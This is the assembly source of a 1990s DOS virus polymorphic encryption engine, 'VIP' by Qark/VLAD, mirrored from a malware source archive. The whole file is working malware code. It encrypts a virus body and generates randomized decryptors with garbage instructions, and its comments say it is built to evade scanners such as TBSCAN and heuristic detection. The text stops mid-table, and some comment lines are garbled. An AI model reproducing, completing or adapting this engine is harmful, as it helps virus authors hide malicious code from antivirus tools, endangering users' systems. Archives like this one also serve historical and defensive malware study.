mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-18 16:25:28 +00:00
1242 lines
30 KiB
NASM
1242 lines
30 KiB
NASM
|
||
;
|
||
; VLAD Infinite Polymorphic - VIP
|
||
; by Qark - VLAD
|
||
;
|
||
; This engine is good in some respects, and poor in others.
|
||
; The encryption it creates is fairly easy to crack, being a looping
|
||
; xor with a keychange (all registers/values chosen at random),
|
||
; but the encryption loops are very hard to detect. There are four
|
||
; different loop types, of which TBSCAN can only find two.
|
||
;
|
||
; At the start of the decryptor, the engine won't produce some instructions
|
||
; that flag heuristics. For this reason, VIP avoids alot of the heuristic
|
||
; problems most other garbage generators have. For example:
|
||
; Doesn't produce INC/DEC in the first 20 bytes to avoid flags.
|
||
; Doesn't produce memory operations in the first 10 bytes.
|
||
; Doesn't produce XCHG in the first 10 bytes.
|
||
; Always uses the short version of instructions (AX/AL Imm etc)
|
||
;
|
||
; One problem that couldn't be avoided is the creation of FFFF word pointers
|
||
; causing crashes. The likelihood of them occurring is low (about 1 in 300
|
||
; samples) because danger instructions have been put to a minimum.
|
||
; (eg mov ax,[bx-1] bx=0, isn't produced anymore).
|
||
;
|
||
; If you're wondering why the polymorphism produced isn't changing, that's
|
||
; because it's an example of slow polymorphism.
|
||
;
|
||
; To assemble, use it as an include file for the program that calls it.
|
||
;
|
||
|
||
|
||
VIP:
|
||
;On entry:
|
||
; AL = 1 if COM file
|
||
; DS:SI = Points to the unencrypted virus
|
||
; ES:DI = Place to store encrypted virus
|
||
; CX = length of virus
|
||
; BP = delta offset
|
||
; Assumes CS=DS=ES
|
||
;On return:
|
||
; CX = length of decryptor + encrypted code
|
||
|
||
cld
|
||
mov word ptr saved_cx,cx
|
||
mov word ptr saved_di,di
|
||
mov word ptr saved_si,si
|
||
mov byte ptr segtype,al
|
||
mov byte ptr inloop,0 ;Initialise variable
|
||
|
||
;Initialise our randomisation for slow polymorphism.
|
||
call init_rand
|
||
|
||
;Clear the register table
|
||
|
||
call unmark_all
|
||
|
||
;Clear the displacements
|
||
call clear_displacement
|
||
|
||
;Select a random decryption type.
|
||
rand_routine:
|
||
call get_rand
|
||
mov si,offset dec_type
|
||
and ax,3*2
|
||
add si,ax
|
||
mov ax,word ptr [si]
|
||
jmp ax
|
||
|
||
Standard:
|
||
;Uses 'standard' encryption.
|
||
; ----This is a basic layout of the decryptor----
|
||
; mov pointer,offset virus_start
|
||
; mov cipher,xorval
|
||
; loop:
|
||
; xor word ptr pointer,cipher
|
||
; inc pointer
|
||
; inc pointer
|
||
; cmp pointer,virus_start+virlength
|
||
; jne loop
|
||
; virus_start:
|
||
; -----------------------------------------------
|
||
|
||
call startup ;Setup pointer and cipher
|
||
|
||
mov byte ptr inloop,1
|
||
mov word ptr loopstart,di
|
||
|
||
call encrypt_type
|
||
|
||
or al,0f8h
|
||
mov ah,al
|
||
mov al,81h ;CMP pointer,xxxx
|
||
stosw
|
||
|
||
call round_up
|
||
add ax,word ptr pointer1val
|
||
stosw
|
||
|
||
call handle_jne ;JNE xx
|
||
call calc_jne
|
||
|
||
mov byte ptr inloop,0
|
||
|
||
;Calculate the displacement
|
||
call fix_displacements
|
||
|
||
call encrypt_virus
|
||
|
||
call decryptor_size
|
||
|
||
ret
|
||
|
||
Stack1:
|
||
;Use the stack method for encryption. This method doesnt work on EXE's
|
||
;because SS <> CS.
|
||
; ----This is a basic layout of the decryptor----
|
||
; mov sp,offset virus_start
|
||
; mov cipher,xor_val
|
||
; loop:
|
||
; pop reg
|
||
; xor reg,cipher
|
||
; push reg
|
||
; pop randomreg
|
||
; cmp sp,virus_start+virus_length
|
||
; jne loop
|
||
; -----------------------------------------------
|
||
|
||
cmp byte ptr segtype,0
|
||
jne stack1_ok
|
||
jmp rand_routine
|
||
stack1_ok:
|
||
call rand_garbage
|
||
call rand_garbage
|
||
mov al,0bch ;MOV SP,xxxx
|
||
stosb
|
||
mov word ptr displace,di
|
||
mov ax,bp
|
||
stosw
|
||
|
||
call setup_cipher
|
||
|
||
mov byte ptr inloop,1
|
||
mov word ptr loopstart,di
|
||
|
||
call select_reg
|
||
call rand_garbage
|
||
push ax
|
||
or al,58h ;POP reg
|
||
stosb
|
||
call rand_garbage
|
||
|
||
mov al,33h ;XOR reg,reg
|
||
stosb
|
||
|
||
pop ax
|
||
push ax
|
||
push cx
|
||
mov cl,3
|
||
shl al,3
|
||
or al,byte ptr cipher
|
||
or al,0c0h
|
||
stosb
|
||
pop cx
|
||
|
||
call rand_garbage
|
||
|
||
pop ax
|
||
or al,50h ;PUSH reg
|
||
stosb
|
||
|
||
call rand_garbage
|
||
next_pop:
|
||
call get_rand
|
||
call check_reg
|
||
jc next_pop
|
||
and al,7
|
||
or al,58h ;POP reg (=add sp,2)
|
||
stosb
|
||
|
||
call rand_garbage
|
||
|
||
mov ax,0fc81h ;CMP SP,xxxx
|
||
stosw
|
||
mov word ptr displace2,di
|
||
|
||
call round_up
|
||
add ax,bp
|
||
stosw
|
||
|
||
call handle_jne
|
||
call calc_jne
|
||
|
||
mov byte ptr inloop,0
|
||
|
||
mov al,0bch ;mov sp,0fffeh
|
||
stosb
|
||
mov ax,0fffeh
|
||
stosw
|
||
|
||
call rand_garbage
|
||
|
||
;Calculate the displacement
|
||
call fix_displacements
|
||
|
||
mov si,word ptr saved_si
|
||
mov cx,word ptr saved_cx
|
||
inc cx
|
||
shr cx,1
|
||
mov bx,word ptr xorval
|
||
enc_stack1:
|
||
lodsw
|
||
xor ax,bx
|
||
stosw
|
||
loop enc_stack1
|
||
|
||
call decryptor_size
|
||
|
||
ret
|
||
|
||
Call_Enc:
|
||
;Uses recursive calls to decrypt the virus. Needs a big stack or else it will
|
||
;crash.
|
||
; ----This is a basic layout of the decryptor----
|
||
; mov pointer,offset virus_start
|
||
; mov cipher,xorval
|
||
; loop:
|
||
; cmp pointer,virus_start+virus_length
|
||
; jne small_dec
|
||
; ret
|
||
; small_dec:
|
||
; xor word ptr pointer,cipher
|
||
; inc pointer
|
||
; inc pointer
|
||
; call loop
|
||
; add sp,virus_length-2
|
||
; -----------------------------------------------
|
||
|
||
call startup
|
||
|
||
mov byte ptr inloop,1
|
||
|
||
mov word ptr loopback,di
|
||
call rand_garbage
|
||
|
||
mov al,byte ptr pointer
|
||
or al,0f8h
|
||
mov ah,al
|
||
mov al,81h ;CMP pointer,xxxx
|
||
stosw
|
||
|
||
call round_up
|
||
add ax,word ptr pointer1val
|
||
stosw
|
||
|
||
call handle_jne
|
||
|
||
mov word ptr loopf,di
|
||
stosb
|
||
|
||
call rand_garbage
|
||
|
||
mov al,0c3h ;RET
|
||
stosb
|
||
|
||
call rand_garbage
|
||
|
||
mov ax,di ;Fix the JNE.
|
||
mov si,word ptr loopf
|
||
inc si
|
||
sub ax,si
|
||
dec si
|
||
mov byte ptr [si],al
|
||
|
||
call encrypt_type
|
||
|
||
mov al,0e8h ;CALL xxxx
|
||
stosb
|
||
mov ax,di
|
||
inc ax
|
||
inc ax
|
||
sub ax,word ptr loopback
|
||
neg ax
|
||
stosw
|
||
|
||
mov byte ptr inloop,0
|
||
|
||
call rand_garbage
|
||
|
||
mov ax,0c481h
|
||
stosw
|
||
mov ax,word ptr saved_cx
|
||
dec ax
|
||
dec ax
|
||
stosw
|
||
|
||
call rand_garbage
|
||
|
||
;Calculate the displacement
|
||
call fix_displacements
|
||
|
||
call encrypt_virus
|
||
|
||
call decryptor_size
|
||
|
||
ret
|
||
|
||
Call_Enc2:
|
||
;Decrypts the virus from within a call.
|
||
; ----This is a basic layout of the decryptor----
|
||
; mov pointer,offset virus_start
|
||
; mov cipher,xorval
|
||
; call decrypt
|
||
; jmp short virus_start
|
||
; decrypt:
|
||
; xor pointer,cipher
|
||
; inc pointer
|
||
; inc pointer
|
||
; cmp pointer,virus_start+viruslength
|
||
; jne decrypt
|
||
; ret
|
||
; -----------------------------------------------
|
||
|
||
call startup
|
||
|
||
mov byte ptr inloop,1
|
||
|
||
mov al,0e8h ;CALL xxxx
|
||
stosb
|
||
stosw
|
||
mov word ptr loopf16,di
|
||
|
||
call rand_garbage
|
||
|
||
mov al,0e9h ;JMP xxxx
|
||
stosb
|
||
mov word ptr displace2,di
|
||
; mov ax,di
|
||
; inc ax
|
||
; inc ax
|
||
; sub ax,saved_di
|
||
; neg ax
|
||
stosw
|
||
|
||
call rand_garbage
|
||
call rand_garbage
|
||
|
||
mov ax,di
|
||
mov si,word ptr loopf16
|
||
sub ax,si
|
||
mov word ptr [si-2],ax
|
||
|
||
mov word ptr loopstart,di
|
||
|
||
call encrypt_type
|
||
|
||
or al,0f8h
|
||
mov ah,al
|
||
mov al,81h ;CMP pointer,xxxx
|
||
stosw
|
||
|
||
call round_up
|
||
add ax,word ptr pointer1val
|
||
stosw
|
||
|
||
call handle_jne
|
||
call calc_jne
|
||
|
||
mov al,0c3h ;ret
|
||
stosb
|
||
|
||
mov byte ptr inloop,0
|
||
|
||
call rand_garbage
|
||
|
||
mov ax,di
|
||
mov si,word ptr displace2
|
||
sub ax,si
|
||
dec ax
|
||
dec ax
|
||
mov [si],ax
|
||
mov word ptr displace2,0
|
||
|
||
call rand_garbage
|
||
|
||
;Calculate the displacement
|
||
call fix_displacements
|
||
|
||
call encrypt_virus
|
||
|
||
call decryptor_size
|
||
|
||
ret
|
||
|
||
db 'VIP V1.0 by Qark/VLAD'
|
||
|
||
|
||
;All the different encryption types
|
||
dec_type dw offset stack1
|
||
dw offset call_enc
|
||
dw offset call_enc2
|
||
dw offset standard
|
||
|
||
segtype db 0 ;1 if com file
|
||
saved_cx dw 0 ;the initial CX
|
||
saved_di dw 0 ;the initial DI
|
||
saved_si dw 0
|
||
|
||
displace dw 0
|
||
displace2 dw 0
|
||
dw 0
|
||
|
||
displaceb dw 0
|
||
|
||
inloop db 0 ;=1 if inside a loop else 0
|
||
;if set no 'word ptr' instructions made
|
||
loopstart dw 0 ;for backwards 8 bit
|
||
loopf dw 0 ;for forwards 8 bit
|
||
loopback dw 0 ;backwards 16 bit
|
||
loopf16 dw 0 ;forwards 16 bit
|
||
xorval dw 0
|
||
|
||
cipher db 0
|
||
|
||
r_m db 0 ;The r-m of the pointer
|
||
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
;General routines, used universally
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
Check_Reg:
|
||
;Returns a carry if the register in lower 3 bits of al is bad
|
||
push ax
|
||
push si
|
||
and ax,7
|
||
mov si,offset reg
|
||
add si,ax
|
||
cmp byte ptr [si],0
|
||
pop si
|
||
pop ax
|
||
je ok_reg
|
||
stc
|
||
ret
|
||
ok_reg:
|
||
clc
|
||
ret
|
||
; ax,cx,dx,bx,sp,bp,si,di
|
||
reg db 00,00,00,00,01,00,00,00
|
||
|
||
Mark_Reg:
|
||
;Mark a register as used, AL=reg
|
||
push ax
|
||
push si
|
||
and ax,7
|
||
mov si,offset reg
|
||
add si,ax
|
||
mov byte ptr [si],1
|
||
pop si
|
||
pop ax
|
||
ret
|
||
|
||
UnMark_All:
|
||
;Clears the register table, and sets SP
|
||
push ax
|
||
push di
|
||
push cx
|
||
mov di,offset reg
|
||
mov al,0
|
||
mov cx,8
|
||
cs:
|
||
rep stosb
|
||
mov byte ptr cs:[reg+4],1 ;set sp
|
||
pop cx
|
||
pop di
|
||
pop ax
|
||
ret
|
||
|
||
Clear_Displacement:
|
||
;Clears all the displacement variables
|
||
push di
|
||
push ax
|
||
mov di,offset displace
|
||
xor ax,ax
|
||
stosw
|
||
stosw
|
||
stosw
|
||
stosw
|
||
stosw
|
||
pop ax
|
||
pop di
|
||
ret
|
||
|
||
Select_Pointer:
|
||
;Select an r-m as a pointer, you must call this routine before reserving
|
||
;any registers. Updates the variable r_m.
|
||
push ax
|
||
push si
|
||
call get_rand
|
||
and ax,7
|
||
mov byte ptr r_m,al
|
||
|
||
call index_2_pointer
|
||
mov al,byte ptr [si]
|
||
call mark_reg
|
||
inc si
|
||
mov al,byte ptr [si]
|
||
cmp al,0
|
||
je no_pointer2
|
||
call mark_reg
|
||
no_pointer2:
|
||
pop si
|
||
pop ax
|
||
ret
|
||
|
||
Setup_Pointer:
|
||
;Sets up the registers specified in the r-m with random values. These
|
||
;values are put into the variable 'pointval'.
|
||
;Moves the instructions into ES:DI.
|
||
push ax
|
||
push si
|
||
|
||
call rand_garbage
|
||
|
||
call index_2_pointer
|
||
mov al,byte ptr [si]
|
||
mov byte ptr pointer,al
|
||
or al,0b8h ;MOV REG,xxxx
|
||
stosb
|
||
call get_rand
|
||
stosw
|
||
mov word ptr pointval,ax
|
||
mov word ptr pointer1val,ax
|
||
|
||
call rand_garbage
|
||
|
||
mov al,byte ptr [si+1]
|
||
cmp al,0
|
||
je no_setupp2
|
||
|
||
or al,0b8h ;MOV REG,xxxx
|
||
stosb
|
||
|
||
call get_rand
|
||
stosw
|
||
add word ptr pointval,ax
|
||
|
||
call rand_garbage
|
||
|
||
no_setupp2:
|
||
|
||
pop si
|
||
pop ax
|
||
ret
|
||
|
||
Index_2_Pointer:
|
||
;Sets SI to the 'pointers' table of the r_m
|
||
push ax
|
||
xor ax,ax
|
||
mov al,byte ptr r_m
|
||
shl ax,1
|
||
mov si,offset pointers
|
||
add si,ax
|
||
pop ax
|
||
ret
|
||
|
||
pointer db 0 ;the first register
|
||
pointer1val dw 0 ;the value of the first register
|
||
pointval dw 0
|
||
Pointers db 3,6 ;[bx+si]
|
||
db 3,7 ;[bx+di]
|
||
db 5,6 ;[bp+si]
|
||
db 5,7 ;[bp+di]
|
||
db 6,0 ;[si]
|
||
db 7,0 ;[di]
|
||
db 5,0 ;[bp]
|
||
db 3,0 ;[bx]
|
||
|
||
Select_Reg:
|
||
;Reserves a random register, and passes it out in AL
|
||
;AH is destroyed
|
||
call get_rand
|
||
call check_reg
|
||
jc select_reg
|
||
and al,7
|
||
call mark_reg
|
||
ret
|
||
|
||
Setup_Reg:
|
||
;Puts the value specified in BX, into the register specified in AL.
|
||
;-Needs Fixing- to add a possible SUB, and also the garbage generation needs
|
||
;to produce the same add/sub opcodes.
|
||
|
||
push ax
|
||
push bx
|
||
|
||
call rand_garbage
|
||
|
||
and al,7
|
||
push ax
|
||
or al,0b8h ;MOV reg,xxxx
|
||
stosb
|
||
|
||
call get_rand
|
||
|
||
sub bx,ax
|
||
stosw
|
||
|
||
call rand_garbage
|
||
|
||
pop ax
|
||
cmp al,0
|
||
jne long_addreg
|
||
mov al,5 ;ADD AX,xxxx
|
||
stosb
|
||
jmp short finish_add
|
||
long_addreg:
|
||
or al,0c0h
|
||
mov ah,al
|
||
mov al,81h
|
||
stosw ;ADD reg,xxxx
|
||
finish_add:
|
||
mov ax,bx
|
||
stosw
|
||
|
||
call rand_garbage
|
||
|
||
pop bx
|
||
pop ax
|
||
ret
|
||
|
||
Seg_Override:
|
||
;Puts the correct segment before a memory write. The memory write must be
|
||
;called immediately afterwards.
|
||
push ax
|
||
cmp byte ptr segtype,1
|
||
je no_segset
|
||
mov al,2eh ;CS:
|
||
stosb
|
||
no_segset:
|
||
pop ax
|
||
ret
|
||
|
||
Fix_Pointer:
|
||
;Fixes up the mod/rm field of a pointer instruction. Before this routine
|
||
;is called, the opcode field has already been stosb'd. eg for xor, 31h has
|
||
;been put into the current es:[di-1].
|
||
;on entry AL=register
|
||
;The displacement field (the following 2 bytes) must be fixed up manually.
|
||
|
||
push ax
|
||
push bx
|
||
push cx
|
||
|
||
mov cl,3
|
||
shl al,cl
|
||
or al,byte ptr r_m
|
||
or al,80h
|
||
stosb
|
||
|
||
pop cx
|
||
pop bx
|
||
pop ax
|
||
ret
|
||
|
||
Dec_Inc_Reg:
|
||
;Inc/Dec's the reg in AL. AH= 0=inc 1=dec
|
||
;No garbage generators are called in this routine, because the flags
|
||
;may be important.
|
||
push ax
|
||
mov byte ptr dec_inc,ah
|
||
call get_rand
|
||
test al,1
|
||
pop ax
|
||
push ax
|
||
jnz do_inc_dec
|
||
cmp al,0 ;check for ax
|
||
jne not_ax_incdec
|
||
mov ax,0ff05h ;ADD AX,ffff = DEC AX
|
||
cmp byte ptr dec_inc,0
|
||
jne fdec1
|
||
mov al,2dh ;SUB
|
||
fdec1:
|
||
stosw
|
||
mov al,0ffh
|
||
stosb
|
||
pop ax
|
||
ret
|
||
not_ax_incdec:
|
||
cmp byte ptr dec_inc,0
|
||
je fdec2
|
||
or al,0c0h
|
||
jmp short fdec3
|
||
fdec2:
|
||
or al,0e8h
|
||
fdec3:
|
||
mov ah,al
|
||
mov al,83h ;ADD reg,ffff = DEC reg
|
||
stosw
|
||
mov al,0ffh
|
||
stosb
|
||
pop ax
|
||
ret
|
||
do_inc_dec:
|
||
or al,40h ;INC reg
|
||
cmp byte ptr dec_inc,0
|
||
je fdec4
|
||
or al,8
|
||
fdec4:
|
||
stosb
|
||
pop ax
|
||
ret
|
||
dec_inc db 0 ;0=inc 1=dec
|
||
|
||
Round_Up:
|
||
;Rounds up the number in saved_cx to the nearest 2 and passes it out in AX.
|
||
mov ax,word ptr saved_cx
|
||
inc ax
|
||
shr ax,1
|
||
shl ax,1
|
||
mov word ptr saved_cx,ax
|
||
ret
|
||
|
||
Fix_Displacements:
|
||
;Adds the size of the produced decyptors to the data listed in the
|
||
;displacement variables. 0 Values signal the end.
|
||
;DI=The final length of the 'decryptor'
|
||
|
||
push ax
|
||
push si
|
||
|
||
mov ax,di
|
||
sub ax,word ptr saved_di
|
||
push di
|
||
mov si,offset displace
|
||
disp_loop:
|
||
cmp word ptr [si],0
|
||
je last_displacement
|
||
mov di,[si]
|
||
add [di],ax
|
||
inc si
|
||
inc si
|
||
jmp short disp_loop
|
||
last_displacement:
|
||
pop di
|
||
pop si
|
||
pop ax
|
||
ret
|
||
|
||
Rand_Garbage:
|
||
;Generates 1-4 garbage instructions.
|
||
push ax
|
||
call get_rand
|
||
and ax,07h
|
||
push cx
|
||
mov cx,ax
|
||
inc cx
|
||
start_garbage:
|
||
call select_garbage
|
||
loop start_garbage
|
||
pop cx
|
||
pop ax
|
||
ret
|
||
|
||
Select_Garbage:
|
||
;Selects a garbage routine to goto
|
||
|
||
call get_rand
|
||
and ax,14
|
||
push si
|
||
mov si,offset calls
|
||
add si,ax
|
||
mov ax,word ptr [si]
|
||
pop si
|
||
jmp ax
|
||
|
||
calls dw offset Make_Inc_Dec
|
||
dw offset Imm2Reg
|
||
dw offset Rand_Instr
|
||
dw offset Mov_Imm
|
||
dw offset Make_Xchg
|
||
dw offset Rand_Instr
|
||
dw offset Mov_Imm
|
||
dw offset Imm2Reg
|
||
|
||
Make_Inc_Dec:
|
||
;Puts a word INC/DEC in ES:DI
|
||
;eg INC AX
|
||
; DEC BP
|
||
|
||
mov ax,di
|
||
sub ax,word ptr saved_di
|
||
cmp ax,15
|
||
ja not_poly_start ;inc/dec in the first 20 bytes, flags
|
||
ret
|
||
not_poly_start:
|
||
call get_rand
|
||
call check_reg
|
||
jc make_inc_dec
|
||
and al,0fh
|
||
or al,40h
|
||
|
||
test al,8
|
||
jnz calc_dec
|
||
|
||
stosb
|
||
ret
|
||
calc_dec:
|
||
mov ah,al
|
||
and al,7
|
||
cmp al,2
|
||
ja Make_Inc_Dec
|
||
mov al,ah
|
||
stosb
|
||
ret
|
||
|
||
Fix_Register:
|
||
;AX=random byte, where the expected outcome is ah=opcode al=mod/rm
|
||
;Carry is set if bad register. Word_Byte is updated to show word/byte.
|
||
test ah,1
|
||
jnz word_garbage
|
||
mov byte ptr word_byte,0
|
||
call check_breg
|
||
jmp short byte_garbage
|
||
word_garbage:
|
||
mov byte ptr word_byte,1
|
||
call check_reg
|
||
byte_garbage:
|
||
ret
|
||
word_byte db 0 ;1=word, 0 = byte
|
||
|
||
|
||
Imm2Reg:
|
||
;Immediate to register.
|
||
call get_rand
|
||
call fix_register
|
||
jc imm2reg
|
||
test al,7 ;AX/AL arent allowed (causes heuristics)
|
||
jz imm2ax
|
||
xchg al,ah
|
||
and al,3
|
||
cmp al,2 ;signed byte is bad
|
||
je imm2reg
|
||
or al,80h
|
||
or ah,0c0h
|
||
stosw
|
||
test al,2 ;signed word
|
||
jnz ione_stosb
|
||
call get_rand
|
||
cmp byte ptr word_byte,1
|
||
jne ione_stosb
|
||
stosb
|
||
ione_stosb:
|
||
call get_rand
|
||
stosb
|
||
ret
|
||
imm2ax:
|
||
xchg ah,al
|
||
and al,3dh
|
||
or al,4
|
||
stosw
|
||
test al,1
|
||
jnz ione_stosb
|
||
ret
|
||
|
||
Rand_Instr:
|
||
;Creates a whole stack of instructions.
|
||
;and,or,xor,add,sub,adc,cmp,sbb
|
||
|
||
mov ax,di
|
||
sub ax,word ptr saved_di
|
||
cmp ax,10
|
||
ja not_poly_start2 ;in the first 20 bytes, flags G
|
||
ret
|
||
not_poly_start2:
|
||
call get_rand
|
||
;Inloop stops xxx xx,word ptr [xxxx] instructions inside the
|
||
;loops. It changes them to 'byte ptr' which stops the ffff crash
|
||
;problem.
|
||
cmp byte ptr inloop,1
|
||
jne ok_words
|
||
and ah,0feh
|
||
ok_words:
|
||
call fix_register
|
||
jc rand_instr
|
||
push cx
|
||
mov cl,3
|
||
rol al,cl
|
||
pop cx
|
||
xchg ah,al
|
||
and al,039h
|
||
or al,2 ;set direction flag
|
||
stosb
|
||
mov al,ah
|
||
and al,0c0h
|
||
cmp al,0c0h
|
||
je zerobytedisp
|
||
cmp al,0
|
||
je checkdisp
|
||
cmp al,80h
|
||
je twobytedisp
|
||
;sign extended
|
||
mov al,ah
|
||
stosb
|
||
negative_value:
|
||
call get_rand
|
||
cmp al,0ffh
|
||
je negative_value
|
||
stosb
|
||
ret
|
||
twobytedisp:
|
||
mov al,ah
|
||
stosb
|
||
call get_rand
|
||
stosw
|
||
ret
|
||
checkdisp:
|
||
push ax
|
||
and ah,7
|
||
cmp ah,6
|
||
pop ax
|
||
je twobytedisp
|
||
zerobytedisp:
|
||
mov al,ah
|
||
stosb
|
||
ret
|
||
|
||
Mov_Imm:
|
||
;Puts a MOV immediate instruction.
|
||
call get_rand
|
||
test al,8
|
||
jnz word_mov
|
||
call check_breg
|
||
jmp short mov_check
|
||
word_mov:
|
||
call check_reg
|
||
mov_check:
|
||
jc mov_imm
|
||
and al,0fh
|
||
or al,0b0h
|
||
stosb
|
||
test al,8
|
||
jnz mov_word
|
||
call get_rand
|
||
stosb
|
||
ret
|
||
mov_word:
|
||
call get_rand
|
||
stosw
|
||
ret
|
||
|
||
Init_Rand:
|
||
;Initialises the Get_Rand procedure.
|
||
push ax
|
||
push cx
|
||
push dx
|
||
push si
|
||
push ds
|
||
mov si,1
|
||
mov ax,0ffffh ;Get word from ROM BIOS.
|
||
mov ds,ax
|
||
mov ax,word ptr [si]
|
||
pop ds
|
||
mov word ptr randseed,ax
|
||
call get_rand
|
||
push ax
|
||
mov ah,2ah ;Get Date.
|
||
int 21h ;call int21h
|
||
pop ax
|
||
add ax,cx
|
||
xor ax,dx
|
||
mov word ptr randseed,ax
|
||
call get_rand
|
||
pop si
|
||
pop dx
|
||
pop cx
|
||
pop ax
|
||
ret
|
||
|
||
Get_Rand:
|
||
;Gets a random number in AX.
|
||
push cx
|
||
push dx
|
||
mov ax,word ptr randseed
|
||
mov cx,ax
|
||
mov dx,ax
|
||
and cx,1ffh
|
||
or cl,01fh
|
||
propogate:
|
||
add dx,ax
|
||
mul dx
|
||
add ax,4321h
|
||
neg ax
|
||
ror dx,1
|
||
loop propogate
|
||
mov word ptr randseed,ax
|
||
|
||
pop dx
|
||
pop cx
|
||
ret
|
||
randseed dw 0
|
||
|
||
Make_Xchg:
|
||
mov ax,di
|
||
sub ax,word ptr saved_di
|
||
cmp ax,10
|
||
ja not_poly_start3 ;inc/dec in the first 20 bytes, flags
|
||
ret
|
||
not_poly_start3:
|
||
|
||
call get_rand
|
||
call fix_register
|
||
jc make_xchg
|
||
push cx
|
||
mov cl,3
|
||
rol al,cl
|
||
pop cx
|
||
call fix_register
|
||
jc make_xchg
|
||
test ah,1
|
||
jz xchg_8bit
|
||
test al,7
|
||
jz xchg_ax2
|
||
test al,38h
|
||
jz xchg_ax1
|
||
xchg_8bit:
|
||
and ax,13fh
|
||
or ax,86c0h
|
||
xchg ah,al
|
||
stosw
|
||
ret
|
||
xchg_ax1:
|
||
and al,7
|
||
or al,90h
|
||
stosb
|
||
ret
|
||
xchg_ax2:
|
||
push cx
|
||
mov cl,3
|
||
ror al,cl
|
||
pop cx
|
||
jmp short xchg_ax1
|
||
|
||
Check_bReg:
|
||
;Checks if an 8bit reg is used or not.
|
||
;AL=register
|
||
push ax
|
||
and al,3
|
||
call check_reg
|
||
pop ax
|
||
ret
|
||
|
||
Decryptor_Size:
|
||
;Calculate the size of the decryptor + code
|
||
;Entry: DI=everything done
|
||
;Exit : CX=total decryptor length
|
||
|
||
mov cx,di
|
||
sub cx,word ptr saved_di
|
||
ret
|
||
|
||
Setup_Cipher:
|
||
;Randomly selects a cipher register and initialises it with a value.
|
||
;Puts the register into the variable 'cipher' and the value into 'xorval'
|
||
|
||
call rand_garbage
|
||
call get_rand
|
||
mov bx,ax
|
||
mov word ptr xorval,ax
|
||
call select_reg
|
||
mov byte ptr cipher,al
|
||
call setup_reg
|
||
call rand_garbage
|
||
ret
|
||
|
||
Startup:
|
||
;Does the most common startup procedures. Puts some garbage, and sets
|
||
;up the pointer register.
|
||
|
||
call rand_garbage
|
||
call rand_garbage
|
||
call select_pointer ;Setup pointer
|
||
call setup_pointer
|
||
|
||
call setup_cipher
|
||
ret
|
||
|
||
Handle_JNE:
|
||
;Randomly puts either JNE or JB at ES:DI.
|
||
;Must be called after the CMP instruction.
|
||
push ax
|
||
push si
|
||
|
||
;Test to make sure our pointer isnt going +ffff, if so, only use
|
||
;jne, not jnb.
|
||
call round_up
|
||
add ax,word ptr pointer1val
|
||
jnc random_jne
|
||
mov al,75h
|
||
jmp short unrandom_jne
|
||
random_jne:
|
||
|
||
call get_rand
|
||
and ax,1
|
||
mov si,offset jne_table
|
||
add si,ax
|
||
mov al,byte ptr [si]
|
||
unrandom_jne:
|
||
stosb
|
||
pop si
|
||
pop ax
|
||
ret
|
||
|
||
jne_table db 75h ;JNE/JNZ
|
||
db 72h ;JB/JNAE
|
||
|
||
Calc_JNE:
|
||
;Calculates the distance needed to JMP backwards and puts it into ES:DI.
|
||
;On entry DI points to the byte after a JNE/JB instruction
|
||
; and 'loopstart' contains the offset of the loop.
|
||
|
||
push ax
|
||
mov ax,di
|
||
inc ax
|
||
sub ax,word ptr loopstart
|
||
neg al
|
||
stosb
|
||
call rand_garbage
|
||
pop ax
|
||
ret
|
||
|
||
Increase_Pointer:
|
||
;Increases the register specified in 'pointer' by two.
|
||
;On exit AL=pointer register.
|
||
|
||
call rand_garbage
|
||
xor ax,ax
|
||
mov al,byte ptr pointer
|
||
call dec_inc_reg
|
||
call rand_garbage
|
||
call dec_inc_reg
|
||
call rand_garbage
|
||
ret
|
||
|
||
Encrypt_Type:
|
||
;Selects the type of encryption and sets everything up.
|
||
call rand_garbage
|
||
call seg_override
|
||
|
||
call rand3
|
||
mov al,byte ptr [si+1]
|
||
mov byte ptr encbyte,al
|
||
|
||
mov al,byte ptr [si] ;The instruction from 'enc_table'
|
||
stosb
|
||
|
||
mov al,byte ptr cipher
|
||
call fix_pointer
|
||
mov word ptr displace,di
|
||
|
||
mov ax,bp
|
||
sub ax,word ptr pointval
|
||
stosw
|
||
|
||
call rand_garbage
|
||
|
||
call rand3
|
||
mov al,byte ptr [si+2]
|
||
or al,0c3h
|
||
mov byte ptr encb2,al
|
||
|
||
cmp byte ptr cipher,0
|
||
jne fix_16imm
|
||
mov al,byte ptr [si+2]
|
||
or al,5
|
||
stosb
|
||
jmp short set_imm
|
||
|
||
fix_16imm:
|
||
mov al,81h
|
||
stosb
|
||
mov al,byte ptr [si+2]
|
||
or al,0c0h
|
||
or al,byte ptr cipher
|
||
stosb
|
||
|
||
set_imm:
|
||
call get_rand
|
||
stosw
|
||
|
||
mov word ptr encval2,ax
|
||
|
||
call increase_pointer
|
||
|
||
ret
|
||
|
||
enc_table db 31h ;XOR ;Direct word operation
|
||
db 33h ;XOR reg,reg ;Undo..
|
||
db 30h
|
||
|
||
db 01h ;ADD
|
||
db 2bh ;SUB reg,reg
|
||
db 0 ;ADD
|
||
